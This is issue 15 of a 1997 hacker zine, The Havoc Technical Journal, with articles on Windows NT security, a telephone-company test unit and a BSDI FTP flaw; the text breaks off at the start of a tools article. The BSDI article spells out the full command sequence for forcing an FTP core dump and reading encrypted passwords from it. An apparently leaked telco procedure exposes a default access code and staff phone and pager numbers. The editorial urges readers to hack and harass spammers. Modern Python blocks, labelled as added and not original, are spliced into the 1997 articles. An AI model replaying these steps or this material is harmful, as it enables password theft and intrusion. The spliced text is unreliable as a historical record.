
The Havoc Technical Journal 15

  

╒═════════════════════════════════════════════════════╕
│ the havoc technical journal - http://www.thtj.com - │▒
└─────────────────────────────────────────────────────┘▒
 ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

vol. 2 no. 3 issue 15 │ October 1, 1997 │ a thtj communications publication
═────────────────────────────────────────────────────────────────────────────═

 ╒══════════════════════════════════════╕
-│ the havoc technical journal issue 15 │-
 └──────────────────────────────────────┘
Editorial..............................Scud-O
Windows NT Security Education Guide....NeonSurge
Single Access Serving System (SASS)....anonymous
BSDI FTP CORE DUMPS....................Bronc Buster
Security/Monitoring Tools..............Shok
Cryptanalytic Attacks..................The Messiah
Shadow files explained.................Shypht
SMTP server scanner....................memor
About The Internet Protocol............Malhavoc
ShokDial - a linux war dialer..........Shok
Under The Hood of Blowfish.............The Messiah
Learning to Count All Over Again.......Bronc Buster
scan.c.................................memor
Vuls in Solaris 2.5.1..................Shok
Operating Systems......................Fucking Hostile
Hacking your way to DOS................Devix
A phreak's dream come true.............Kode9
Rat Shak Shopping Made Easy............N-TREEG
Telephone Conferencing.................DataThief
How To Make A Cattleprod...............The Messiah
Securing Linux.........................KiDMaGiC
Social Insurance Numbers...............Devix
Stupid Unix Pranks.....................The Darkling
Oddville, THTJ.........................Scud-O
The News...............................KungFuFox

────────────────────────────────────────────────
╒══════════════════════════════════════╕
│           the NEW thtj.com           │
│               ────────               │
│ coming soon from thtj communications │
└──────────────────────────────────────┘

Shouts go out to all my people on the block:
The writers. You're the ones that make thtj run, and it is you that help to
keep the community informed. We owe you.

Other Shouts out go to:
All of #phreak, #hackers, #hackphreak,
#carparts, #linuxos, #phrack, (you all know who you are)

═────────────────────────────────────────────────────────────────────────────═

╒══════════════════════════════════════╕
│the havoc technical journal - contacts│
└──────────────────────────────────────┘

- Editor in Chief : Scud-O, scud@thtj.com
- Assistant Editor : KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- thtj email address: thtj@thtj.com
- thtj website: http://www.thtj.com/
- thtj mailing address: PO BOX 448 Sykesville, MD 21784

The Havoc Technical Journal Vol. 2, No.3, October 1, 1997.
A THTJ Communications publication. Contents Copyright (©)
1997 THTJ Communications. All Rights Reserved. No part of
this publication may be reproduced in whole or in part
without the expressed written consent of the Editor in Chief
of The Havoc Technical Journal. [No copying THTJ, damnit.]

The Havoc Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.

The articles provided in this magazine are without any
expressed or implied warranties. While every effort has been
taken to ensure the accuracy of the information contained in
this article, the authors, editors, and contributors of this
zine assume no responsibility for errors or omissions, or for
damages resulting from the use of the information contained
herein.

For information about using articles published in THTJ, send mail to:
e-mail: thtj@thtj.com │ mail: THTJ PO Box 448 Sykesville, MD 21784

NOTICE: If you are an official of a government or an employee
of a government, you must register with THTJ before reading
any issue of this publication. A registration form will be
mailed to you free of charge by using either of the mailing
addresses above. Upon reception of this form you will be granted
privilege to read all issues of The Havoc Technical Journal.
Until you have registered, you are not authorized to read this
or any issues of THTJ.

═────────────────────────────────────────────────────────────────────────────═
Editorial
by Scud-O

The NEW thtj.

Well, with all great plans, the 'new thtj' that was scheduled for thtj14 is a
month late, and here it is. I hope you enjoy it. I personally think that this
is the best issue yet. This month as some of you know, I was fairly
intoxicated, and seriously looked into giving up thtj. However, thanks to all
of you out there, the staff of thtj communications, HBS, #phreak, the
writers, and the editors, it all came together, and so, here is thtj15,
bigger, badder, and kicking more ass.
This issue also marks a change that you may or may not have noticed.
thtj is now produced by thtj communications, inc. Havoc Bell Systems no
longer publishes thtj, since it seems that so many of you thought that you
had to be in HBS to write for thtj. This is entirely false. Anyone and
everyone is free to write for thtj. HBS is not dying, but we will hopefully
be able to focus more on group stuff, and less about thtj deadlines now that
thtj isn't officially in our hands.
The redesigned thtj.com site is about to be coming at you, with a lot
of new things that will hopefully make your life easier, and *gasp* more
complete. thtj.com is finally going to have a majordomo or two up, have some
e-mail forwarders for instant, easy access to current thtj issues, and
article submission information. The www site is also going to improve. A
bunch of you have said that the site is fairly lynx friendly, but it needs
work. Less graphics and more content are on their way, as are some new cgis,
wwwboards, and redesigned pages for distribution as well as submissions.
Last, but certainly not least, will be the new main page. I am adding site
links and info up top, so that all of you can skip over my rantings in the
message of the day section. I am also hoping to make a forum for everyone to
discuss their issues or problems with the community, so if you would like to
contribute to that, get a hold of me.

Finally this month, before I am done, I would like to talk with you
about some things that need to be done, and some things I would like to see on
thtj.com. I have found various sources on the net for helping to block and
protect your site and your sendmail from spammers using your site as a
transfer site for their e-mail, to protect their servers from the flames. I
am going to be adding some code for this, and other security info for you,
since if you have a system up, you are just as curious about setting up
system security as you are breaking it up.
The reason I bring this all up is that spam is a serious problem.
Retards like the 'spam king' (who recently had his servers disconnected)
think that we all like having e-mail telling us about stupid products. The
fact that we all know is that no one wants this shit. If you own your own
domain you know about all this. You get hundreds of spam letters offering
'web registering services' and all the trash. We need to stop this, and we
would, or could, but losers like the aforementioned 'spam king' use many
servers to redirect their mail, and do not let you know who the mail is from, so
you cannot ask him to stop. Securing your site with the code I talked about
is a step, but go beyond that. Spammers have ruined parts of the net, but not
all of it. Take action, strike back, hack them, harass them, spam them, make
them learn to go fuck themselves. Well, thank you for the time it took you to
read my rants.

Scud-O , Founder, and Editor in Chief of THTJ

═────────────────────────────────────────═
Scud-O and HBS would like to hear your views on this commentary.
Please feel free to e-mail us at: scud@thtj.com

----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-

scud@thtj.com │ http://www.thtj.com

═────────────────────────────────────────────────────────────────────────────═
The Windows NT Security Education Guide (SEG) Part One
by NeonSurge of Shatter
(neonsurge@hotmail.com)

NT Security components and subsystem

The Logon Process

WinLogon

Users must log on to a Windows NT machine in order to use that NT based
machine or network. The logon process itself is mandatory and cannot be
bypassed. Once the user has logged on, an access token is created (this
token will be discussed in more detail later). This token contains user
specific security information, such as the security identifier, group
identifiers, user rights and permissions. The user, as well as all processes
spawned by the user, are identified to the system with this token.


The first step in the WinLogon process is something we are all familiar with,
CTRL+ALT+DEL. This is NT's default Security Attention Sequence (SAS). (The SAS
key combo can be changed; we will also discuss that later.) The SAS is a
signal to the operating system that someone is trying to log on. After the
SAS is triggered, all user mode applications pause until the security
operation completes or is cancelled. (Note: The SAS is not just a logon
operation; the same key combination can be used for logging on, logging off,
changing a password or locking the workstation.) The pausing, or closing, of
all user mode applications during SAS is a security feature that most people
take for granted and don't understand. Because applications are paused,
logon related trojan viruses are stopped, and keyloggers (programs that run in
memory, keeping track of keystrokes and thereby recording someone's password)
are stopped as well.

The user name is not case sensitive but the password is.

After typing in your information and clicking OK (or pressing enter), the
WinLogon process supplies the information to the security subsystem, which
in turn compares the information to the Security Accounts Manager (SAM). If
the information matches the information in the SAM, an access token
is created for the user. WinLogon takes the access token and passes it
on to the Win32 subsystem, which in turn starts the operating system's shell.
The shell, as well as all other spawned processes, will receive a token. This
token is not only used for security, but also allows NT's auditing and logging
features to track user usage and access of network resources.


Note: All of the logon components are located in a file known as the
Graphical Identification and Authentication (GINA) module, specifically
MSGINA.DLL. Under certain conditions, this file can be replaced, which is
how you would change the SAS key combination.

For fine tuning of the WinLogon process, you can refer to the registry. All
of the options for the WinLogon process are contained in the
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon area.
You can also fine tune the process by using the Policy Editor.


Logging on to a Domain

If an NT machine is a participant on a Domain, you would not only need to
log in to the local machine, but to the Domain as well. If a computer is a
member of a Domain, the WinLogon process is replaced by the NetLogon process.


Components

Local Security Authority (LSA):
    Also known as the security subsystem, it is the central portion of NT
    security. It handles local security policies and user authentication.
    The LSA also handles generating and logging audit messages.

Security Accounts Manager (SAM):
    The SAM handles user and group accounts, and provides user
    authentication for the LSA.

Security Reference Monitor (SRM):
    The SRM is in charge of enforcing and assuring access validation and
    auditing for the LSA. It references user account information as the
    user attempts to access resources.

TCP/IP Security in NT

Note: This section is not meant to teach you the concepts behind the TCP/IP
protocol. It is assumed that a working knowledge of TCP/IP can be applied.


Windows NT has a built in TCP/IP security functionality that most
people do not use or know about. This functionality enables you to
control the types of network traffic that can reach your NT servers.
Access can be allowed or denied based on specific TCP ports, UDP
ports, and IP protocols. This type of security is normally applied to
servers connected directly to the internet, which is not recommended.

To configure NT's built in TCP/IP security, follow these steps:

1 - Right click on Network Neighborhood and go to the Properties
option.

2 - Select the Protocols tab, highlight TCP/IP and click on
Properties.

3 - Select the IP address tab of the TCP/IP properties screen.

4 - Check the check box that reads "Enable Security".

5 - Click on Configure

You should now be looking at the TCP/IP Security dialog, which has
the following options:

-Adapter: Specifies which of the installed network adapter cards you
are configuring
-TCP Ports
-UDP Ports
-IP Protocols

Within these settings, you would choose which ports and what access
permissions you would like to assign to those ports. The following
is a list of the well known TCP/IP ports. This is not an in
depth guide, just a quick reference (for more details, check RFC 1060).


Service Port Comments

TCP Ports
echo 7/tcp
discard 9/tcp sink null
systat 11/tcp users
daytime 13/tcp
netstat 15/tcp
qotd 17/tcp quote
chargen 19/tcp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
name 42/tcp nameserver
whois 43/tcp nicname
nameserver 53/tcp domain
apts 57/tcp any private terminal service
apfs 59/tcp any private file service
rje 77/tcp netrjs
finger 79/tcp
http 80/tcp
link 87/tcp ttylink
supdup 95/tcp
newacct 100/tcp [unauthorized use]
hostnames 101/tcp hostname
iso-tsap 102/tcp tsap
x400 103/tcp
x400-snd 104/tcp
csnet-ns 105/tcp CSNET Name Service
pop-2 109/tcp pop postoffice
sunrpc 111/tcp
auth 113/tcp authentication
sftp 115/tcp
uucp-path 117/tcp
nntp 119/tcp usenet readnews untp
ntp 123/tcp network time protocol
statsrv 133/tcp
profile 136/tcp
NeWS 144/tcp news
print-srv 170/tcp
exec 512/tcp remote process execution; authentication performed using
    passwords and UNIX login names
login 513/tcp remote login a la telnet; automatic authentication performed
    based on privileged port numbers and distributed data bases which
    identify "authentication domains"
cmd 514/tcp like exec, but automatic authentication is performed as for
    login server
printer 515/tcp spooler
efs 520/tcp extended file name server
tempo 526/tcp newdate
courier 530/tcp rpc
conference 531/tcp chat
netnews 532/tcp readnews
uucp 540/tcp uucpd
klogin 543/tcp
kshell 544/tcp krcmd
dsf 555/tcp
remotefs 556/tcp rfs server
chshell 562/tcp chcmd
meter 570/tcp demon
pcserver 600/tcp Sun IPC server
nqs 607/tcp nqs
mdqs 666/tcp
rfile 750/tcp
pump 751/tcp
qrh 752/tcp
rrh 753/tcp
tell 754/tcp send
nlogin 758/tcp
con 759/tcp
ns 760/tcp
rxe 761/tcp
quotad 762/tcp
cycleserv 763/tcp
omserv 764/tcp
webster 765/tcp
phonebook 767/tcp phone
vid 769/tcp
rtip 771/tcp
cycleserv2 772/tcp
submit 773/tcp
rpasswd 774/tcp
entomb 775/tcp
wpages 776/tcp
wpgs 780/tcp
mdbs 800/tcp
device 801/tcp
maitrd 997/tcp
busboy 998/tcp
garcon 999/tcp
blackjack 1025/tcp network blackjack
bbn-mmc 1347/tcp multi media conferencing
bbn-mmx 1348/tcp multi media conferencing
orasrv 1525/tcp oracle
ingreslock 1524/tcp
issd 1600/tcp
nkd 1650/tcp
dc 2001/tcp
mailbox 2004/tcp
berknet 2005/tcp
invokator 2006/tcp
dectalk 2007/tcp
conf 2008/tcp
news 2009/tcp
search 2010/tcp
raid-cc 2011/tcp raid
ttyinfo 2012/tcp
raid-am 2013/tcp
troff 2014/tcp
cypress 2015/tcp
cypress-stat 2017/tcp
terminaldb 2018/tcp
whosockami 2019/tcp
servexec 2021/tcp
down 2022/tcp
ellpack 2025/tcp
shadowserver 2027/tcp
submitserver 2028/tcp
device2 2030/tcp
blackboard 2032/tcp
glogger 2033/tcp
scoremgr 2034/tcp
imsldoc 2035/tcp
objectmanager 2038/tcp
lam 2040/tcp
interbase 2041/tcp
isis 2042/tcp
rimsl 2044/tcp
dls 2047/tcp
dls-monitor 2048/tcp
shilp 2049/tcp
NSWS 3049/tcp
rfa 4672/tcp remote file access server
complexmain 5000/tcp
complexlink 5001/tcp
padl2sim 5236/tcp
man 9535/tcp


UDP Ports
echo 7/udp
discard 9/udp sink null
systat 11/udp users
daytime 13/udp
netstat 15/udp
qotd 17/udp quote
chargen 19/udp ttytst source
time 37/udp timserver
rlp 39/udp resource
name 42/udp nameserver
whois 43/udp nicname
nameserver 53/udp domain
bootps 67/udp bootp
bootpc 68/udp
tftp 69/udp
sunrpc 111/udp
erpc 121/udp
ntp 123/udp
statsrv 133/udp
profile 136/udp
snmp 161/udp
snmp-trap 162/udp
at-rtmp 201/udp
at-nbp 202/udp
at-3 203/udp
at-echo 204/udp
at-5 205/udp
at-zis 206/udp
at-7 207/udp
at-8 208/udp
biff 512/udp used by mail system to notify users of new mail received;
    currently receives messages only from processes on the same machine
who 513/udp maintains data bases showing who's logged in to machines on a
    local net and the load average of the machine
syslog 514/udp
talk 517/udp like tenex link, but across machine - unfortunately, doesn't
    use link protocol (this is actually just a rendezvous port from which a
    tcp connection is established)
ntalk 518/udp
utime 519/udp unixtime
router 520/udp local routing process (on site); uses variant of Xerox NS
    routing information protocol
timed 525/udp timeserver
netwall 533/udp for emergency broadcasts
new-rwho 550/udp new-who
rmonitor 560/udp rmonitord
monitor 561/udp
meter 571/udp udemon
elcsd 704/udp errlog copy/server daemon
loadav 750/udp
vid 769/udp
cadlock 770/udp
notify 773/udp
acmaint_dbd 774/udp
acmaint_trnsd 775/udp
wpages 776/udp
puparp 998/udp
applix 999/udp Applix ac
puprouter 999/udp
cadlock 1000/udp
hermes 1248/udp
wizard 2001/udp curry
globe 2002/udp
emce 2004/udp CCWS mm conf
oracle 2005/udp
raid-cc 2006/udp raid
raid-am 2007/udp
terminaldb 2008/udp
whosockami 2009/udp
pipe_server 2010/udp
servserv 2011/udp
raid-ac 2012/udp
raid-cd 2013/udp
raid-sf 2014/udp
raid-cs 2015/udp
bootserver 2016/udp
bootclient 2017/udp
rellpack 2018/udp
about 2019/udp
xinupagesrver 2020/udp
xinuexpnsion1 2021/udp
xinuexpnsion2 2022/udp
xinuexpnsion3 2023/udp
xinuexpnsion4 2024/udp
xribs 2025/udp
scrabble 2026/udp
isis 2042/udp
isis-bcast 2043/udp
rimsl 2044/udp
cdfunc 2045/udp
sdfunc 2046/udp
dls 2047/udp
shilp 2049/udp
rmontor_scure 5145/udp
xdsxdm 6558/udp
isode-dua 17007/udp




The Nbtstat Command

This tool is worth knowing, because it can give you tons of info about an NT
server. It can be used to query the network for NetBIOS information.
It can also be useful for purging the NetBIOS cache and reloading the LMHOSTS
file. This one command can be extremely useful when performing security
audits. When one knows how to interpret the information, it can reveal more
than one might think.

Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s]
               [interval]

Switches

  -a         Lists the remote computer's name table given its host name.

  -A         Lists the remote computer's name table given its IP address.

  -c         Lists the remote name cache including the IP addresses.

  -n         Lists local NetBIOS names.

  -r         Lists names resolved by broadcast and via WINS.

  -R         Purges and reloads the remote cache name table.

  -S         Lists sessions table with the destination IP addresses.

  -s         Lists sessions table converting destination IP addresses to
             host names via the hosts file.

  interval   This will redisplay the selected statistics, pausing for the
             number of seconds you choose as "interval" between each
             listing. Press CTRL+C to stop.

Notes on NBTSTAT

The column headings generated by NBTSTAT have the following meanings:

Input
Number of bytes received.

Output
Number of bytes sent.

In/Out
Whether the connection is from the computer (outbound) or from another
system to the local computer (inbound).

Life
The remaining time that a name table cache entry will "live" before your
computer purges it.

Local Name
The local NetBIOS name given to the connection.

Remote Host
The name or IP address of the remote host.

Type
A name can have one of two types: unique or group.
The last byte of the 16 character NetBIOS name often means something
because the same name can be present multiple times on the same computer.
This shows the last byte of the name converted into hex.

State
Your NetBIOS connections will be shown in one of the following "states":

State           Meaning

Accepting       An incoming connection is in process.

Associated      The endpoint for a connection has been created and your
                computer has associated it with an IP address.

Connected       This is a good state! It means you're connected to the
                remote resource.

Connecting      Your session is trying to resolve the name-to-IP address
                mapping of the destination resource.

Disconnected    Your computer requested a disconnect, and it is waiting
                for the remote computer to do so.

Disconnecting   Your connection is ending.

Idle            The remote computer has been opened in the current
                session, but is currently not accepting connections.

Inbound         An inbound session is trying to connect.

Listening       The remote computer is available.

Outbound        Your session is creating the TCP connection.

Reconnecting    If your connection failed on the first attempt, it will
                display this state as it tries to reconnect.

16th Byte character Values for NetBios names

<00> Workstation service name
<03> Messenger service name
<1B> Domain Master Browser name
<06> RAS Server service
<1F> NetDDE service
<20> Server service name
<21> RAS Client
<BE> Network monitor agent
<BF> Network monitor utility
<1C> Domain group name
<1D> Master browser name
<1E> Normal group name
_MSBROWSE_ Domain master browser

The messenger service name <03> will give you the name of any users currently
logged onto that machine, including the administrator account name.
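
Reading a name table with the suffix list above, as an added example (not part of the original article): the Python below parses a constructed nbtstat -A listing, labels each row from the article's 16th-byte table, and separates the <03> names that belong to users from the machine's own name. The host and user names are made up, and treating unique <00>/<20> names as the machine's own name is an assumption of this example.

```python
import re

# 16th-byte suffix meanings, copied from the table in the article above.
SUFFIX_MEANING = {
    "00": "Workstation service name",
    "03": "Messenger service name",
    "06": "RAS Server service",
    "1B": "Domain Master Browser name",
    "1C": "Domain group name",
    "1D": "Master browser name",
    "1E": "Normal group name",
    "1F": "NetDDE service",
    "20": "Server service name",
    "21": "RAS Client",
    "BE": "Network monitor agent",
    "BF": "Network monitor utility",
}

# One row of the name table: NAME <xx> UNIQUE|GROUP Status
ROW = re.compile(
    r"^\s*(?P<name>\S.*?)\s*<(?P<suffix>[0-9A-Fa-f]{2})>\s+"
    r"(?P<type>UNIQUE|GROUP)\s+(?P<status>\S+)"
)

# Constructed sample in the layout nbtstat -A prints; all names are made up.
SAMPLE = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
FILESRV01      <00>  UNIQUE      Registered
CORP           <00>  GROUP       Registered
FILESRV01      <20>  UNIQUE      Registered
FILESRV01      <03>  UNIQUE      Registered
JSMITH         <03>  UNIQUE      Registered
CORP           <1E>  GROUP       Registered
..__MSBROWSE__.<01>  GROUP       Registered
"""


def parse_name_table(text):
    """Return one dict per name-table row found in nbtstat output."""
    entries = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # headers, rulers and blank lines
        suffix = m.group("suffix").upper()
        entries.append({
            "name": m.group("name"),
            "suffix": suffix,
            "type": m.group("type"),
            "status": m.group("status"),
            "meaning": SUFFIX_MEANING.get(suffix, "not in the article's table"),
        })
    return entries


def machine_names(entries):
    """Names the host registers for itself (assumed: unique <00> or <20>)."""
    return {e["name"] for e in entries
            if e["type"] == "UNIQUE" and e["suffix"] in ("00", "20")}


def logged_on_names(entries):
    """Unique <03> names other than the machine's own name, i.e. the
    account names the Messenger service is announcing on the wire."""
    own = machine_names(entries)
    return sorted({e["name"] for e in entries
                   if e["suffix"] == "03" and e["type"] == "UNIQUE"
                   and e["name"] not in own})


def unexpected_rows(entries, expected_suffixes):
    """Rows whose suffix is outside what the administrator expects this
    host to register (for example, Messenger on a server)."""
    return [e for e in entries if e["suffix"] not in expected_suffixes]


if __name__ == "__main__":
    table = parse_name_table(SAMPLE)
    for e in table:
        print(f'{e["name"]:<16} <{e["suffix"]}> {e["type"]:<6} {e["meaning"]}')
    print("account names visible via <03>:", logged_on_names(table))
    for e in unexpected_rows(table, {"00", "20", "1E"}):
        print("review:", e["name"], f'<{e["suffix"]}>', e["meaning"])
```

Run against your own servers' output during an audit, the last two reports show which account names and services a machine is advertising to anyone who can query it.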


That's about it for part one. Look out for future releases. Questions or
comments to NeonSurge@hotmail.com

═────────────────────────────────────────────────────────────────────────────═
Single Access Serving System (SASS)
(anonymous)

PROCESS
DOCUMENTATION


Santa Ana, April 8, 1997

SUBJECT
Single Access Serving System (SASS).

REASON FOR ISSUANCE
This document will provide an EM Communication Technician with installation
procedures for the Single Access Serving System (SASS).

SWITCH TYPES AFFECTED
5ESS, DMS100 and 1AESS

GENERIC/BCS REQUIRED
None

WORK FUNCTIONS AFFECTED
Local Field Operations (LFO) EM Communication Technicians

EFFECTIVE / CRITICAL DATES
Effective immediately.

TRACKING CODE
Baseline

QUESTIONS
Questions regarding this document may be directed to Michele Baker at (714)
430-6640

GENERAL INFORMATION
SASS is a transmission conditioning unit, a printed wiring card that employs
a microprocessor control of test functions and provides voice prompting. The
card is installed in an MFT bay and connected to the switch through an
outgoing trunk. A dedicated POTS line is required for the ringback feature.
This Single Serving Access System will allow both outside field technicians
as well as LFO technicians the ability to perform multiple test functions
using one access number.

The Unit Test Features are:

- ANI
- Single Tone Generation
- Three Tone slope
- Ten Tone Slope
- Full Tone Sweep
- Caller ID Transmission
- Data Sweep
- Quiet Termination
- Keypad Test

CENTRAL OFFICE (CO)
REQUIREMENTS
1. An MFT slot
2. An outgoing trunk OR A D4 port equipped with a DPT Channel Unit.
3. A new Trunk Group assignment will be established
4. The SASS Access Number will need to be route indexed to the trunk or port
assigned.
5. Assignment and cross connect to a POTS line for ringback capabilities.

CENTRAL OFFICE (CO)
PROCESS (1) Wiring the Circuit
1. You will receive two service orders for your SASS circuit. One for the
design itself (se word) and one for the POTS line (1ML) associated with it.
The POTS order will consist of only an OE assignment used for ringback
capabilities.

NOTE 1) The design portion of your order will resemble a DID circuit.
NOTE 2) Every effort will be made to use a digital trunk assignment,
however, if none are available, an analog trunk will be used in its
place.
NOTE 3) Make sure the channel unit used in the circuit is a D4CD200
(terminating).

CENTRAL OFFICE (CO)
PROCESS (2) Installing and Optioning The Channel Unit
Install the SASS Unit into the designated MFT slot. Once the plug-in has
been installed it should be optioned according to the manufacturers
instructions on the card.

CENTRAL OFFICE (CO)
PROCESS (3) Initial Power-Up Verification
Once the SASS unit is installed and optioned the Initial Power-up
verification must be performed at the unit itself.

CENTRAL OFFICE (CO)
PROCESS (4) Procedure for Setting Transmission Levels
Once the SASS unit has passed the Initial Power-up verification the
Transmission Levels must be set for the unit. The following is the procedure
for setting transmission levels on a newly installed SASS Unit. This
function must be performed at the mainframe to any pair assigned to an OE in
the respective switch in which the SASS unit was installed. The pair must be
open and the reading taken toward the line card.

STEP  ACTION
1     At the mainframe, remove the coils from any working pair assigned to an
      OE in the respective switch.
2     Draw dial tone on the OE side of the open and dial the SASS access
      number.
3     Enter the SASS Security Code after the number announcement. The default
      Security Code is 222-2222.
4     Press 3 to Read or Change Prefixes.
5     Press 5 to Generate Test Tone.
6     Enter * to Generate System Tone.
7     Measure Tone with a transmission measurement test set. Should measure a
      level of 0dbBRNC.
      NOTE 1) Adjustments may be made by entering a 6 to increase the level
      by 0.1 dB each time the 6 is depressed, or entering 7 to decrease the
      level by 0.1 dB each time the 7 is depressed.
8     When you have completed setting the db levels, hang up to terminate the
      call.
9     A test must be performed on at least three (3) prefixes to determine
      whether the db levels were set correctly in all prefixes. A deviation
      of + or -1/2 db is acceptable. If tests reveal any variance greater
      than + or -1/2 db, you must repeat the procedure for Setting
      Transmission Levels for every prefix.

CENTRAL OFFICE (CO)
PROCESS (5) Testing The Newly Installed SASS Unit
When the SASS installation is complete, call the Test System Health Group to
test the newly installed unit. They will in turn close the order out with
OCS.

CENTRAL OFFICE (CO)
PROCESS (6) Troubleshooting A Newly Installed SASS Unit
When the SASS installation is complete, the Initial Power-up verification has
been performed, the transmission levels have been set and your circuit is
still not turned up, try the following troubleshooting procedures.

CENTRAL OFFICE (CO)
PROCESS (7) Who To Call When You Have Questions Concerning:

Closing out your order     Test System Health Group
SASS Project               SASS Project Team
Word order assignments     FACS Administrator
Spares                     PICS
Test coordination          Test System Health Group
Translations               NTG
This document              PP&STM
Trunk Assignments          NTG

CONTACT NUMBERS

NTG
- South Trouble Desk (619) 886-1988
- North Trouble Desk (916) xxx-xxxx

PADS
- South (619) 886-1988
- North (916) xxx-xxxx

PICS
- (not provided)

Process, Product & System Technical Management (PP&STM)
- Michele Baker Voice/Voice mail (714) 430-6640
Pager Number (714) 755-8424

Test System Health Group
- (Statewide) Voice (800) 694-4732

SASS Project Team
- Bruce Poole Voice/Voice mail (209) 454-3197
Pager Number (510) 904-7574

REFERENCES
Harris
Dracon Division
Single Access Serving System (SASS)
Transmission Conditioning Unit
Model 24800-300
Service Manual
011-724800-300 (Issue 3 2/94)

Harris (Addendum)
Dracon Division
SASS
Transmission Conditioning Unit
Model 24800-300
Service Manual
011-724209-001 (Issue 5 6/96)

Questions?
At what point will I know that translations are typed in.
At what point does the ntec ask the ess to idle trunk? Before setting levels.

═────────────────────────────────────────────────────────────────────────────═
BSDI FTP CORE DUMPS
by Bronc Buster
(www.showdown.org)
(bbuster@succeed.net)

It was over a year ago that I first reported my findings to Bugtraq,
BSDI, and CERT about the potential security holes with BSD's core dumping
problems. On the day of 3 Sept 97 BSDI finally released a patch for this
hole, but as most of you know, most SysAdmins don't keep track of patches
and their release dates because everyone always thinks they are immune
to attack.

This hole uses the massive built in feature on BSD systems that they use
to make their Unix version more stable and less prone to crashing, Core
Dumps. By using this function to force a core dump after accessing the
password file you will be able to retrieve encrypted passwords from the
core dump. This only works on BSDI BSD/OS 2.X and NOT BSD 3.X.

How it works: you FTP in as a legit user, then stop the process and then
kill it, forcing a core dump. By forcing the dump after the FTP program
(wu ftpd 2.4 used) has accessed the password file it will dump the stack
and all the information in it to a core dump file owned by that user in
the present working directory. I think the commands for this exploit are
very easy to understand and are self explanatory.



main: {1} % ftp succeed.net // FTP to localhost
Connected to succeed.net.
220 main.succeed.net FTP server
(Version wu-2.4(2) Tue Jan 7 08:37:31 EST 1997)
ready.
Name (succeed.net:bbuster): bbuster // Login as a user
331 Password required for bbuster.
Password:
230 User bbuster logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ^Z // Control Z and suspend it
Suspended
main: {2} % ps // Find PID number of FTP
PID TT STAT TIME COMMAND
23875 p2 Is 0:00.13 -csh (csh)
23967 p2 S+ 0:00.03 telnet localhost
23969 p3 Ss 0:00.10 -csh (csh)
23978 p3 T 0:00.02 ftp succeed.net
23989 p3 R+ 0:00.01 ps
main: {3} % kill -11 23978 // Kill -11 the FTP process
main: {4} % fg // Call FTP back to Foreground
ftp succeed.net
Segmentation fault (core dumped) // Dump the core
main: {5} % strings ftp.core > test // Strings it to a file for reading
main: {6} % cat test // Get the passwords


That's it. This is not the only problem with BSDI BSD/OS systems
and their core dumps; there was the well known write tty core dump
which essentially did the same thing as this exploit does, but it was
patched much faster.
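
An administrator's check for the exposure described above, as an added example that is not part of the original article: the Python below sweeps a directory tree for core files and reports those that contain password-file entries, naming the accounts but never returning the hashes. The sample core image, its hash values and the function names are constructed for illustration.

```python
import os
import re
import stat

# name:hash:uid:gid: with a real-looking password field. Thirteen characters
# is the length of a traditional crypt(3) DES hash; placeholder fields such
# as "*" or "x" are too short to match and are ignored.
PASSWD_ENTRY = re.compile(
    r"(?<![A-Za-z0-9_.-])([a-z_][a-z0-9_.-]{0,31}):([!-9;-~]{13,}):(\d+):(\d+):"
)

# Constructed stand-in for a core image: binary junk around three
# password-file lines. The hash values are fake.
SAMPLE_CORE = (
    b"\x00\x01\x02stack junk\x00\xff\xfe"
    b"root:FAKEHASH00001:0:0::0:0:Charlie Root:/root:/bin/csh\n"
    b"daemon:*:1:1::0:0:The devil himself:/:/sbin/nologin\n"
    b"bbuster:FAKEHASH00002:1001:100::0:0:Example User:/home/bbuster:/bin/csh\n"
    b"\x00\x00more junk 220 main FTP server\x00"
)


def find_password_entries(data):
    """Return account name, byte offset and hash length for every
    password-file entry found in a core image. The hash is not returned."""
    text = data.decode("latin-1")  # one character per byte keeps offsets exact
    return [
        {"user": m.group(1), "offset": m.start(), "hash_len": len(m.group(2))}
        for m in PASSWD_ENTRY.finditer(text)
    ]


def is_core_name(name):
    """True for 'core' and for BSD-style '<program>.core' file names."""
    return name == "core" or name.endswith(".core")


def scan_tree(root, max_bytes=64 * 1024 * 1024):
    """Walk root and report core files that hold password-file entries."""
    reports = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not is_core_name(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue  # skip symlinks, devices and FIFOs
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                continue  # unreadable or vanished, nothing to report
            hits = find_password_entries(data)
            if hits:
                reports.append({
                    "path": path,
                    "owner_uid": st.st_uid,
                    "readable_by_others": bool(
                        st.st_mode & (stat.S_IRGRP | stat.S_IROTH)),
                    "users": [h["user"] for h in hits],
                })
    return reports


if __name__ == "__main__":
    import sys
    for report in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(report["path"], "uid", report["owner_uid"],
              "group/world readable" if report["readable_by_others"] else "private",
              "accounts:", ", ".join(report["users"]))
```

Any file it reports should be removed, and the accounts it names should have their passwords changed.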

Overall BSDI BSD/OS, all versions, is one of the most secure Unix
systems on the market today and when an exploit is found for it we
must treat it like gold as BSDI is usually very fast in fixing them.

Bronc Buster!!!

[EOF]

═────────────────────────────────────────────────────────────────────────────═
Security/Monitoring tools
by Shok
(shok@sekurity.org)

Okay, well........welcome to this thing......by Shok.
What I plan for this to be is some various utilities that you might think
of as useful and what not. This is mainly a few security tips that I like to
use.

First off, edit your /etc/profile, and add the line:
export HISTFILE=/tmp/hist/`whoami`

and then do:
